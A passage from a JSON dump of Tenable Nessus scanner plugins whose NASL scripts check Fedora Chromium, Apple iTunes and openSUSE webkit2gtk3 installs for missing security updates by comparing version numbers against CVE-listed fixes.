CVE-2018-17466 CVE-2018-17467 CVE-2018-17468 CVE-2018-17469 CVE-2018-17470 CVE-2018-17471 CVE-2018-17473 CVE-2018-17474 CVE-2018-17475 CVE-2018-17476 CVE-2018-5179 CVE-2018-17477\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : chromium (2018-fd194a1f14)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-16435", "CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-17478", "CVE-2018-17479", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-FD194A1F14.NASL", "href": "https://www.tenable.com/plugins/nessus/120933", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-fd194a1f14.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120933);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-16435\",\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\",\n \"CVE-2018-17478\",\n \"CVE-2018-17479\",\n \"CVE-2018-5179\"\n );\n script_xref(name:\"FEDORA\", value:\"2018-fd194a1f14\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 28 : chromium (2018-fd194a1f14)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Security fix for CVE-2018-17478 CVE-2018-17479. Update to\n70.0.3538.110.\n\n----\n\nUpdate to chromium 70.0.3538.77. Fixes CVE-2018-16435 CVE-2018-17462\nCVE-2018-17463 CVE-2018-17464 CVE-2018-17465 CVE-2018-17466\nCVE-2018-17467 CVE-2018-17468 CVE-2018-17469 CVE-2018-17470\nCVE-2018-17471 CVE-2018-17473 CVE-2018-17474 CVE-2018-17475\nCVE-2018-17476 CVE-2018-5179 CVE-2018-17477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-fd194a1f14\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17479\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"chromium-70.0.3538.110-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:41", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.4. It is, therefore, affected by multiple vulnerabilities in WebKit as referenced in the HT208694 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-04-03T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.4 WebKit Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4130", "CVE-2018-4144", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4163", "CVE-2018-4165"], "modified": "2019-04-05T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_4.NASL", "href": "https://www.tenable.com/plugins/nessus/108795", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108795);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/04/05 23:25:09\");\n\n script_cve_id(\n \"CVE-2018-4101\",\n \"CVE-2018-4113\",\n \"CVE-2018-4114\",\n \"CVE-2018-4117\",\n \"CVE-2018-4118\",\n \"CVE-2018-4119\",\n \"CVE-2018-4120\",\n \"CVE-2018-4121\",\n \"CVE-2018-4122\",\n \"CVE-2018-4125\",\n \"CVE-2018-4127\",\n \"CVE-2018-4128\",\n \"CVE-2018-4129\",\n \"CVE-2018-4130\",\n \"CVE-2018-4144\",\n \"CVE-2018-4146\",\n \"CVE-2018-4161\",\n \"CVE-2018-4163\",\n \"CVE-2018-4165\"\n);\n script_bugtraq_id(102775);\n\n script_name(english:\"Apple iTunes < 12.7.4 WebKit Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.4. It is, therefore, affected by multiple vulnerabilities\nin WebKit as referenced in the HT208694 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208694\");\n script_set_attribute(attribute:\"solution\", value:\n \"Upgrade to Apple iTunes version 12.7.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4144\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.7.4\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:32:51", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.4. It is, therefore, affected by multiple vulnerabilities in WebKit as referenced in the HT208694 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-04-03T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.3 WebKit Multiple Vulnerabilities (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4130", "CVE-2018-4144", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4163", "CVE-2018-4165"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_4_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/108796", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108796);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2018-4101\",\n \"CVE-2018-4113\",\n \"CVE-2018-4114\",\n \"CVE-2018-4117\",\n \"CVE-2018-4118\",\n \"CVE-2018-4119\",\n \"CVE-2018-4120\",\n \"CVE-2018-4121\",\n \"CVE-2018-4122\",\n \"CVE-2018-4125\",\n \"CVE-2018-4127\",\n \"CVE-2018-4128\",\n \"CVE-2018-4129\",\n \"CVE-2018-4130\",\n \"CVE-2018-4144\",\n \"CVE-2018-4146\",\n \"CVE-2018-4161\",\n \"CVE-2018-4163\",\n \"CVE-2018-4165\"\n );\n script_bugtraq_id(102775);\n\n script_name(english:\"Apple iTunes < 12.7.3 WebKit Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.4. It is, therefore, affected by multiple vulnerabilities\nin WebKit as referenced in the HT208694 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208474\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4144\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type != 'Windows') audit(AUDIT_OS_NOT, \"Windows\");\n\nfixed_version = \"12.7.4\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:14:40", "description": "This update for webkit2gtk3 to version 2.22.5 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-4372, CVE-2018-4345, CVE-2018-4386, CVE-2018-4375, CVE-2018-4376, CVE-2018-4378, CVE-2018-4382, CVE-2018-4392, CVE-2018-4416, CVE-2018-4191, CVE-2018-4197, CVE-2018-4299, CVE-2018-4306, CVE-2018-4309, CVE-2018-4312, CVE-2018-4314, CVE-2018-4315, CVE-2018-4316, CVE-2018-4317, CVE-2018-4318, CVE-2018-4319, CVE-2018-4323, CVE-2018-4328, CVE-2018-4358, CVE-2018-4359, CVE-2018-4361, CVE-2018-4373, CVE-2018-4162, CVE-2018-4163, CVE-2018-4165, CVE-2018-11713, CVE-2018-4207, CVE-2018-4208, CVE-2018-4209, CVE-2018-4210, CVE-2018-4212, CVE-2018-4213, CVE-2018-4437, CVE-2018-4438, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464 (bsc#1119558, bsc#1116998, bsc#1110279)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-24T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2019-81)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11713", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4191", "CVE-2018-4197", "CVE-2018-4207", "CVE-2018-4208", "CVE-2018-4209", "CVE-2018-4210", "CVE-2018-4212", "CVE-2018-4213", "CVE-2018-4299", "CVE-2018-4306", "CVE-2018-4309", "CVE-2018-4312", "CVE-2018-4314", "CVE-2018-4315", "CVE-2018-4316", "CVE-2018-4317", "CVE-2018-4318", "CVE-2018-4319", "CVE-2018-4323", "CVE-2018-4328", "CVE-2018-4345", "CVE-2018-4358", "CVE-2018-4359", "CVE-2018-4361", "CVE-2018-4372", "CVE-2018-4373", "CVE-2018-4375", "CVE-2018-4376", "CVE-2018-4378", "CVE-2018-4382", "CVE-2018-4386", "CVE-2018-4392", "CVE-2018-4416", "CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-81.NASL", "href": "https://www.tenable.com/plugins/nessus/121339", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-81.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121339);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-11713\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4191\", \"CVE-2018-4197\", \"CVE-2018-4207\", \"CVE-2018-4208\", \"CVE-2018-4209\", \"CVE-2018-4210\", \"CVE-2018-4212\", \"CVE-2018-4213\", \"CVE-2018-4299\", \"CVE-2018-4306\", \"CVE-2018-4309\", \"CVE-2018-4312\", \"CVE-2018-4314\", \"CVE-2018-4315\", \"CVE-2018-4316\", \"CVE-2018-4317\", \"CVE-2018-4318\", \"CVE-2018-4319\", \"CVE-2018-4323\", \"CVE-2018-4328\", \"CVE-2018-4345\", \"CVE-2018-4358\", \"CVE-2018-4359\", \"CVE-2018-4361\", \"CVE-2018-4372\", \"CVE-2018-4373\", \"CVE-2018-4375\", \"CVE-2018-4376\", \"CVE-2018-4378\", \"CVE-2018-4382\", \"CVE-2018-4386\", \"CVE-2018-4392\", \"CVE-2018-4416\", \"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-81)\");\n script_summary(english:\"Check for the openSUSE-2019-81 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.22.5 fixes the following\nissues :\n\nSecurity issues fixed :\n\n - CVE-2018-4372, CVE-2018-4345, CVE-2018-4386,\n CVE-2018-4375, CVE-2018-4376, CVE-2018-4378,\n CVE-2018-4382, CVE-2018-4392, CVE-2018-4416,\n CVE-2018-4191, CVE-2018-4197, CVE-2018-4299,\n CVE-2018-4306, CVE-2018-4309, CVE-2018-4312,\n CVE-2018-4314, CVE-2018-4315, CVE-2018-4316,\n CVE-2018-4317, CVE-2018-4318, CVE-2018-4319,\n CVE-2018-4323, CVE-2018-4328, CVE-2018-4358,\n CVE-2018-4359, CVE-2018-4361, CVE-2018-4373,\n CVE-2018-4162, CVE-2018-4163, CVE-2018-4165,\n CVE-2018-11713, CVE-2018-4207, CVE-2018-4208,\n CVE-2018-4209, CVE-2018-4210, CVE-2018-4212,\n CVE-2018-4213, CVE-2018-4437, CVE-2018-4438,\n CVE-2018-4441, CVE-2018-4442, CVE-2018-4443,\n CVE-2018-4464 (bsc#1119558, bsc#1116998, bsc#1110279)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1110279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116998\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119558\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Webkit JIT Exploit for iOS 7.1.2');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", 